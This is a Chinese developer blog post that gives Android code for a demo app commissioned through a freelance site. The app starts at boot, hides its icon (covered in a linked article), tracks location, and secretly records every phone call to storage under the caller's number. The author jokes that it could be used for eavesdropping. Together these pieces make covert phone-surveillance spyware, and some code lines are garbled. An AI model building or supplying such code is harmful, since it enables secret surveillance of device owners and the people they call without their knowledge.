最近在看猪八戒的网站,看到有些客户的需求,就做了一个小小的demo。
需求基本上是这样的,主要的就是定位,APP开机启动,电话录音,APP 图标不可见。
定位就不多说了,开发者都应该用过腾讯,高德或者百度的地图SDK。APP图标不可见的话在之前的文章中已经提到过,有兴趣的同学可以看一下链接。
http://blog.csdn.net/caicai1377/article/details/52472846
下面着重说一下开机启动,以及电话录音的问题。(说不定这东西还可以用来窃听哦,开个玩笑。)
首先,大家要了解一个基本的知识。当Android启动时,会发出一个系统广播,内容为ACTION_BOOT_COMPLETED,它的字符串常量表示为android.intent.action.BOOT_COMPLETED。只要在程序中“捕捉”到这个消息,再启动之即可。记住,Android框架说:Don't call me, I'll call you back。我们要做的是等到接收这个消息,而实现的手段就是实现一个BroadcastReceiver。
1 接收广播消息:BootBroadcastReceiver.java
package com.example;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
/**
* Created with IntelliJ IDEA.
* User: 蔡培源
* Date: 2016年9月8日
* Time: 17:04:34
* To change this template use File | Settings| File Templates.
*/
public class BootBroadcastReceiver extends BroadcastReceiver {
static final String ACTION = "android.intent.action.BOOT_COMPLETED";
@Override
public void onReceive(Context context, Intent intent) {
if (intent.getAction().equals(ACTION)) {
Intent mainActivityIntent = new Intent(context,MainActivity.class); // 要启动的Activity
mainActivityIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(mainActivityIntent);
}
}
}
该类派生自BroadcastReceiver,覆载方法onReceive中,检测接收到的Intent是否符合BOOT_COMPLETED,如果符合,则启动MainActivity。
2,主界面 MainActivity.java
package com.example;
import android.app.AlertDialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.view.*;
import android.widget.Toast;
public classMainActivityextendsActivity { // 收到消息启动此Activity
@Override
publicvoid onCreate(Bundle savedInstanceState){
super.onCreate(savedInstanceState);
super.setIntegerProperty("splashscreen", R.drawable.wandapad_splash);
TextView tv = newTextView(this);
tv.setText("Hello这是MainActivity");
setContentView(tv);
}
3、配置文件:AndroidManifest.xml
在application内添加一下配置:
<receiverandroid:name=".BootBroadcastReceiver">
<intent-filter>
<actionandroid:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
向系统注册了一个receiver,子节点intent-filter表示接收android.intent.action.BOOT_COMPLETED消息。
4、在manifest中添加以下权限
<uses-permissionandroid:name="android.permission.RECEIVE_BOOT_COMPLETED"></uses-permission>
5、大功告成!
延伸思考:
在多数情况下,要自动运行的不是有界面的程序,而是在后台运行的service。此时,就要用startService来启动相应的service了。
监听电话的部分 manifest
1. <?xml version="1.0" encoding="utf-8"?>
2. <manifest xmlns:android="http://schemas.android.com/apk/res/android"
3. package="codefans.app"
4. android:versionCode="1"
5. android:versionName="1.0" >
6.
7. <uses-sdk android:minSdkVersion="8" />
8.
9. <!-- 监听电话状态权限 -->
10. <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
11.
12. <!-- 在SDCard中创建与删除文件权限 -->
13. <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
14.
15. <!-- 在SDCard写入数据权限 -->
16. <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
17.
18. <!-- 刻入声音权限 -->
19. <uses-permission android:name="android.permission.RECORD_AUDIO"/>
20. <application
21. android:icon="@drawable/ic_launcher"
22. android:label="@string/app_name" >
23. <service android:name=".PhoneService"></service>
24. <receiver android:name=".PhoneBroadcastReceiver">
25. <intent-filter >
26. <action android:name="android.intent.action.BOOT_COMPLETED"/> <!-- 开机启动广播 -->
27. </intent-filter>
28. </receiver>
29. </application>
30.
31. </manifest>
PhoneService
1. public class PhoneService extends Service
2. {
3.
4. @Override
5. public IBinder onBind(Intent intent)
6. {
7. // TODO Auto-generated method stub
8. return null;
9. }
10.
11. @Override
12. public void onCreate()
13. {
14. super.onCreate();
15.
16. TelephonyManager telephonyManager = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);
17.
18. telephonyManager.listen(new PhoneListener(), PhoneStateListener.LISTEN_CALL_STATE); //注册监听器 监听电话状态
19. }
20.
21.
22. private final class PhoneListener extends PhoneStateListener
23. {
24. private String incomeNumber; //来电号码
25. private MediaRecorder mediaRecorder;
26. private File file;
27. @Override
28. public void onCallStateChanged(int state, String incomingNumber)
29. {
30. try
31. {
32. switch(state)
33. {
34. case TelephonyManager.CALL_STATE_RINGING: //来电
35. this.incomeNumber = incomingNumber;
36. break;
37. case TelephonyManager.CALL_STATE_OFFHOOK: //接通电话
38. file = new File(Environment.getExternalStorageDirectory(), this.incomeNumber + System.currentTimeMillis() + ".3gp");
39. mediaRecorder = new MediaRecorder();
40. mediaRecorder.setAudioSource(MediaRecorder.AudioSource.MIC); //获得声音数据源
41. mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); // 按3gp格式输出
42. mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB);
43. mediaRecorder.setOutputFile(file.getAbsolutePath()); //输出文件
44. mediaRecorder.prepare(); //准备
45. mediaRecorder.start();
46. break;
47.
48. case TelephonyManager.CALL_STATE_IDLE: //挂掉电话
49. if(mediaRecorder != null)
50. {
51. mediaRecorder.stop();
52. mediaRecorder.release();
53. mediaRecorder = null;
54. }
55.
56. break;
57.
58. }
59. }
60. catch (IllegalStateException e)
61. {
62. // TODO Auto-generated catch block
63. e.printStackTrace();
64. }
65. catch (IOException e)
66. {
67. // TODO Auto-generated catch block
68. e.printStackTrace();
69. }
70. }
71.
72.
73. }
74.
75.
76. }
开启启动service的BroadcastReceiver
77. public class PhoneBroadcastReceiver extends BroadcastReceiver
78. {
79.
80. @Override
81. public void onReceive(Context context, Intent intent)
82. {
83. Intent service = new Intent(context, PhoneService.class);
84. context.startService(service); //启动服务
85. }
86.
87. }
代码基本都在这里,大家可以试一下,如果有什么问题,欢迎大家关注我的博客提问。 我会第一时间回答协助。